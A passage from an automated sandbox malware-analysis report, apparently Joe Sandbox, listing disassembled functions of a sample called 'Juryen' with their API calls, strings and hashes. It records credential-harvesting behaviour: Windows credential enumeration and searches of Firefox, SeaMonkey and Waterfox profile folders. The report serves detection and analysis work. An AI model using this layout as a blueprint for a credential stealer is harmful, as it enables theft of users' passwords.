                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID: C:\Windows\system32
                                                                    • API String ID: 669240632-2896066436
                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                    Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                    • memset.MSVCRT ref: 0040BE91
                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                    • String ID:
                                                                    • API String ID: 697348961-0
                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403CBF
                                                                    • memset.MSVCRT ref: 00403CD4
                                                                    • memset.MSVCRT ref: 00403CE9
                                                                    • memset.MSVCRT ref: 00403CFE
                                                                    • memset.MSVCRT ref: 00403D13
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403DDA
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                    • API String ID: 4039892925-11920434
                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403E50
                                                                    • memset.MSVCRT ref: 00403E65
                                                                    • memset.MSVCRT ref: 00403E7A
                                                                    • memset.MSVCRT ref: 00403E8F
                                                                    • memset.MSVCRT ref: 00403EA4
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403F6B
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                    • API String ID: 4039892925-2068335096
                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403FE1
                                                                    • memset.MSVCRT ref: 00403FF6
                                                                    • memset.MSVCRT ref: 0040400B
                                                                    • memset.MSVCRT ref: 00404020
                                                                    • memset.MSVCRT ref: 00404035
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 004040FC
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                    • API String ID: 4039892925-3369679110
                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                    • API String ID: 3510742995-2641926074
                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 004033B7
                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                    • String ID: $0.@
                                                                    • API String ID: 2758756878-1896041820
                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2941347001-0
                                                                    • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                    • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403C09
                                                                    • memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                    • API String ID: 1534475566-1174173950
                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                    Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                    • memset.MSVCRT ref: 00414C87
                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 71295984-2036018995
                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00414458
                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                    • String ID: "%s"
                                                                    • API String ID: 1343145685-3297466227
                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                    • API String ID: 1714573020-3385500049
                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004087D6
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                    • memset.MSVCRT ref: 00408828
                                                                    • memset.MSVCRT ref: 00408840
                                                                    • memset.MSVCRT ref: 00408858
                                                                    • memset.MSVCRT ref: 00408870
                                                                    • memset.MSVCRT ref: 00408888
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2911713577-0
                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
